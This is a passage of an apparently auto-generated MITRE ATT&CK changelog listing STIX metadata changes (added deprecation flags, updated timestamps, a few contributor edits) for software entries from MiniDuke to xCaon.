STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:52.183000+00:002025-04-25 14:45:19.566000+00:00

[S0051] MiniDuke

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:12.056000+00:002025-04-25 14:43:31.760000+00:00

[S0079] MobileOrder

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:04.825000+00:002025-04-25 14:43:09.588000+00:00

[S0553] MoleNet

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.182000+00:002025-04-25 14:43:57.040000+00:00

[S0149] MoonWind

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.217000+00:002025-04-25 14:44:13.834000+00:00

[S0590] NBTscan

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:55.369000+00:002025-04-25 14:45:26.872000+00:00

[S0272] NDiskMonitor

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:36.313000+00:002025-04-25 14:44:44.759000+00:00

[S0353] NOKKI

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:53.448000+00:002025-04-25 14:42:35.581000+00:00

[S0637] NativeZone

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.174000+00:002025-04-25 14:44:28.081000+00:00

[S0247] NavRAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.899000+00:002025-04-25 14:43:20.237000+00:00

[S0630] Nebulae

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.683000+00:002025-04-25 14:42:50.875000+00:00

[S0165] OSInfo

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.861000+00:002025-04-25 14:45:06.283000+00:00

[S0644] ObliqueRAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.744000+00:002025-04-25 14:43:25.456000+00:00

[S0346] OceanSalt

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:59.147000+00:002025-04-25 14:42:52.708000+00:00

[S0439] Okrum

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.946000+00:002025-04-25 14:43:14.113000+00:00

[S0365] Olympic Destroyer

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:01.435000+00:002025-04-25 14:42:59.783000+00:00

[S0052] OnionDuke

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.711000+00:002025-04-25 14:44:25.559000+00:00

[S0264] OopsIE

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.971000+00:002025-04-25 14:44:01.012000+00:00

[S0594] Out1

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:53.377000+00:002025-04-25 14:45:22.072000+00:00

[S0072] OwaAuth

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.901000+00:002025-04-25 14:44:19.163000+00:00

[S0598] P.A.S. Webshell

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.296000+00:002025-04-25 14:43:11.044000+00:00

[S0626] P8RAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:19.073000+00:002025-04-25 14:43:50.562000+00:00

[S0158] PHOREAL

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:43.708000+00:002025-04-25 14:45:05.924000+00:00

[S0254] PLAINTEE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.191000+00:002025-04-25 14:42:49.775000+00:00

[S0435] PLEAD

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.485000+00:002025-04-25 19:04:32.446000+00:00
x_mitre_contributors[1]Hannah Simes, BT SecurityHannah S

[S0150] POSHSPY

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:11.901000+00:002025-04-25 14:43:31.381000+00:00

[S0371] POWERTON

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:41.138000+00:002025-04-25 14:44:58.949000+00:00

[S0184] POWRUNER

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.652000+00:002025-04-25 14:42:38.309000+00:00

[S0122] Pass-The-Hash Toolkit

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.785000+00:002025-04-25 14:45:25.272000+00:00

[S0556] Pay2Key

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:18.273000+00:002025-04-25 14:43:48.585000+00:00

[S0643] Peppy

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.700000+00:002025-04-25 14:43:41.735000+00:00

[S0048] PinchDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.358000+00:002025-04-25 14:44:24.120000+00:00

[S0124] Pisloader

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.474000+00:002025-04-25 14:44:31.662000+00:00

[S0453] Pony

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.346000+00:002025-04-25 14:42:50.153000+00:00

[S0177] Power Loader

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.103000+00:002025-04-25 14:42:39.406000+00:00

[S0139] PowerDuke

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:51.754000+00:002025-04-25 14:42:30.325000+00:00

[S0441] PowerShower

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.537000+00:002025-04-25 14:43:19.493000+00:00

[S0393] PowerStallion

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.238000+00:002025-04-25 14:44:50.859000+00:00

[S0279] Proton

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:34.550000+00:002025-04-25 14:44:38.517000+00:00

[S0238] Proxysvc

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:53.139000+00:002025-04-25 14:42:34.849000+00:00

[S0078] Psylo

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:39.039000+00:002025-04-25 14:44:53.196000+00:00

[S0583] Pysa

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.874000+00:002025-04-25 14:44:15.316000+00:00

[S0055] RARSTONE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.673000+00:002025-04-25 14:43:59.385000+00:00

[S0241] RATANKBA

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.215000+00:002025-04-25 14:44:11.826000+00:00

[S0495] RDAT

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:05.635000+00:002025-04-25 14:43:13.198000+00:00

[S0416] RDFSNIFFER

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.986000+00:002025-04-25 14:42:34.305000+00:00

[S0258] RGDoor

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.672000+00:002025-04-25 14:44:32.382000+00:00

[S0003] RIPTIDE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:30.044000+00:002025-04-25 14:44:22.846000+00:00

[S0112] ROCKBOOT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:35.715000+00:002025-04-25 14:44:42.600000+00:00

[S0240] ROKRAT

Current version: 2.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:12.531000+00:002025-04-25 14:43:33.037000+00:00

[S0458] Ramsay

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:32.837000+00:002025-04-25 14:44:32.751000+00:00

[S0169] RawPOS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.883000+00:002025-04-25 14:44:08.401000+00:00

[S0166] RemoteCMD

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:06.578000+00:002025-04-25 14:43:16.265000+00:00

[S0592] RemoteUtilities

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:49.636000+00:002025-04-25 14:45:11.980000+00:00

[S0400] RobbinHood

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.940000+00:002025-04-25 14:42:38.861000+00:00

[S0090] Rover

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.344000+00:002025-04-25 14:43:40.835000+00:00

[S0358] Ruler

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:53.872000+00:002025-04-25 14:45:22.953000+00:00

[S0253] RunningRAT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:12.728000+00:002025-04-25 14:43:33.592000+00:00

[S0446] Ryuk

Current version: 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:27.373000+00:002025-04-22 22:21:23.589000+00:00
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsThe DFIR Report, @TheDFIRReport

[S0195] SDelete

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:56.799000+00:002025-04-25 14:45:30.257000+00:00

[S0185] SEASHARPEE

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:54.263000+00:002025-04-25 14:42:37.580000+00:00

[S0063] SHOTPUT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.918000+00:002025-04-25 14:43:25.821000+00:00

[S0692] SILENTTRINITY

Current version: 1.1

Details
values_changed
STIX FieldOld valueNew Value
modified2024-09-23 14:18:53.140000+00:002025-04-30 13:26:45.728000+00:00
x_mitre_contributors[0]Daniel Acevedo, BlackbotDaniel Acevedo, ARMADO

[S0159] SNUGRIDE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:01.282000+00:002025-04-25 14:42:59.423000+00:00

[S0157] SOUNDBITE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.524000+00:002025-04-25 14:44:12.545000+00:00

[S0053] SeaDuke

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:13.890000+00:002025-04-25 14:43:37.740000+00:00

[S0639] Seth-Locker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:44.630000+00:002025-04-25 14:45:07.890000+00:00

[S0546] SharpStage

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.445000+00:002025-04-25 14:42:40.376000+00:00

[S0444] ShimRat

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:09.372000+00:002025-04-25 14:43:24.555000+00:00

[S0445] ShimRatReporter

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:50.090000+00:002025-04-25 14:45:13.595000+00:00

[S0610] SideTwist

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.737000+00:002025-04-25 14:44:52.304000+00:00

[S0623] Siloscape

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:07.079000+00:002025-04-25 14:43:17.695000+00:00

[S0273] Socksbot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.498000+00:002025-04-25 14:44:56.967000+00:00

[S0627] SodaMaster

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.073000+00:002025-04-25 14:44:05.856000+00:00

[S0516] SoreFang

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.031000+00:002025-04-25 14:44:55.728000+00:00

[S0543] Spark

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.059000+00:002025-04-25 14:42:31.753000+00:00

[S0646] SpicyOmelette

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:10.394000+00:002025-04-25 14:43:27.242000+00:00

[S0058] SslMM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:01.128000+00:002025-04-25 14:42:57.989000+00:00

[S0188] Starloader

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.530000+00:002025-04-25 14:44:07.496000+00:00

[S0142] StreamEx

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:22.967000+00:002025-04-25 14:44:02.994000+00:00

[S0018] Sykipot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:14.881000+00:002025-04-25 14:43:39.731000+00:00

[S0242] SynAck

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:52.360000+00:002025-04-25 14:42:32.305000+00:00

[S0060] Sys10

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:20.019000+00:002025-04-25 14:43:52.533000+00:00

[S0098] T9000

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:20.867000+00:002025-04-25 14:43:55.595000+00:00

[S0586] TAINTEDSCRIBE

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:19.869000+00:002025-04-25 14:43:52.174000+00:00

[S0164] TDTESS

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:55.276000+00:002025-04-25 14:42:39.777000+00:00

[S0199] TURNEDUP

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:38.086000+00:002025-04-25 14:44:50.321000+00:00

[S0467] TajMahal

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:31.332000+00:002025-04-25 14:44:28.616000+00:00

[S0001] Trojan.Mebromi

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:34.746000+00:002025-04-25 14:44:38.888000+00:00

[S0178] Truvasys

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:14.507000+00:002025-04-25 14:43:39.011000+00:00

[S0647] Turian

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:02.104000+00:002025-04-25 14:43:01.037000+00:00

[S0116] UACMe

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:49.934000+00:002025-04-25 14:45:13.232000+00:00

[S0275] UPPERCUT

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:44.933000+00:002025-04-25 14:45:09.125000+00:00

[S0452] USBferry

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:17.950000+00:002025-04-25 14:43:47.313000+00:00

[S0221] Umbreon

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:03.511000+00:002025-04-25 14:43:05.057000+00:00

[S0130] Unknown Logger

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.897000+00:002025-04-25 14:44:22.301000+00:00

[S0442] VBShower

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.823000+00:002025-04-25 14:43:59.751000+00:00

[S0636] VaporRage

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.732000+00:002025-04-25 14:44:08.033000+00:00

[S0155] WINDSHIELD

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:25.359000+00:002025-04-25 14:44:09.479000+00:00

[S0515] WellMail

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:24.228000+00:002025-04-25 14:44:06.771000+00:00

[S0514] WellMess

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:02.903000+00:002025-04-25 14:43:03.067000+00:00

[S0059] WinMM

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:58.498000+00:002025-04-25 14:42:50.511000+00:00

[S0176] Wingbird

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:29.211000+00:002025-04-25 14:44:20.703000+00:00

[S0041] Wiper

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.028000+00:002025-04-25 14:44:15.681000+00:00

[S0161] XAgentOSX

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:10.547000+00:002025-04-25 14:43:27.602000+00:00

[S0117] XTunnel

Current version: 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:17.007000+00:002025-04-25 14:43:45.148000+00:00

[S0341] Xbash

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:15.191000+00:002025-04-25 14:43:40.462000+00:00

[S0251] Zebrocy

Current version: 3.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:28.500000+00:002025-04-25 14:44:17.288000+00:00

[S0027] Zeroaccess

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:08.895000+00:002025-04-25 14:43:22.946000+00:00

[S0202] adbupd

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:37:56.265000+00:002025-04-25 14:42:42.902000+00:00

[S0471] build_downer

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:36.962000+00:002025-04-25 14:44:46.558000+00:00

[S0472] down_new

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:21.345000+00:002025-04-25 14:43:58.304000+00:00

[S0071] hcdLoader

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:26.900000+00:002025-04-25 14:44:13.298000+00:00

[S0068] httpclient

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:40.829000+00:002025-04-25 14:44:58.407000+00:00

[S0278] iKitten

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:00.655000+00:002025-04-25 14:42:56.342000+00:00

[S0101] ifconfig

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.252000+00:002025-04-25 14:45:17.053000+00:00

[S0175] meek

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:52.775000+00:002025-04-25 14:45:20.648000+00:00

[S0102] nbtstat

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:55.076000+00:002025-04-25 14:45:26.343000+00:00

[S0067] pngdowner

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:20.185000+00:002025-04-25 14:43:52.893000+00:00

[S0006] pwdump

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.480000+00:002025-04-25 14:45:24.744000+00:00

[S0227] spwebmember

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:51.100000+00:002025-04-25 14:45:16.528000+00:00

[S0225] sqlmap

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2025-04-16 20:38:54.328000+00:002025-04-25 14:45:24.383000+00:00

[S0653] xCaon

Current version: 1.0

Details
